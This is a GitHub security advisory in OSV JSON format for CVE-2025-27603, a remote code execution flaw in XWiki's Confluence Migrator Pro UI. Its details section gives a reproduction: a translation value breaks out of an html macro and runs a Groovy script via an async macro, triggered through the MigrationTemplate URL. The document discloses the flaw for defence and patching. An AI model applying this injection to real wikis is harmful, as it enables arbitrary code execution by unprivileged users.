{
  "schema_version": "1.4.0",
  "id": "GHSA-6qvp-39mm-95v8",
  "modified": "2025-03-07T19:16:50Z",
  "published": "2025-03-07T16:07:50Z",
  "aliases": [
    "CVE-2025-27603"
  ],
  "summary": "com.xwiki.confluencepro:application-confluence-migrator-pro-ui Remote Code Execution via unescaped translations",
  "details": "### Impact\nA user that doesn't have programming rights can execute arbitrary code when creating a page using the Migration Page template.\nA possible attack vector is the following:\n* Create a page and add the following content: \n```\nconfluencepro.job.question.advanced.input={{/html}} {{async async=\"true\" cached=\"false\" context=\"doc.reference\"}}{{groovy}}println(\"hello from groovy!\"){{/groovy}}{{/async}}\n```\n* Use the object editor to add an object of type `XWiki.TranslationDocumentClass` with scope `USER`.\n* Access an unexisting page using the `MigrationTemplate` \n```\nhttp://localhost:8080/xwiki/bin/edit/Page123?template=ConfluenceMigratorPro.Code.MigrationTemplate\n```\nIt is expected that `{{/html}} {{async async=\"true\" cached=\"false\" context=\"doc.reference\"}}{{groovy}}println(\"hello from groovy!\"){{/groovy}}{{/async}}` will be present on the page, however, `hello from groovy` will be printed.\n### Patches\nThe issue will be fixed as part of v1.2. The fix was added with commit [35cef22](https://github.com/xwikisas/application-confluence-migrator-pro/commit/36cef2271bd429773698ca3a21e47b6d51d6377d)\n\n### Workarounds\nThere are no known workarounds besides upgrading.\n\n### References\nNo references.",
  "severity": [
    {
      "type": "CVSS_V3",
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
    }
  ],
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.xwiki.confluencepro:application-confluence-migrator-pro-ui"
      },
      "ranges": [
        {
          "type": "ECOSYSTEM",
          "events": [
            {
              "introduced": "1.0"
            },
            {
              "fixed": "1.2.0"
            }
          ]
        }
      ]
    }
  ],
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xwikisas/application-confluence-migrator-pro/security/advisories/GHSA-6qvp-39mm-95v8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27603"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwikisas/application-confluence-migrator-pro/commit/36cef2271bd429773698ca3a21e47b6d51d6377d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xwikisas/application-confluence-migrator-pro"
    }
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-95"
    ],
    "severity": "CRITICAL",
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-07T16:07:50Z",
    "nvd_published_at": "2025-03-07T16:15:40Z"
  }
}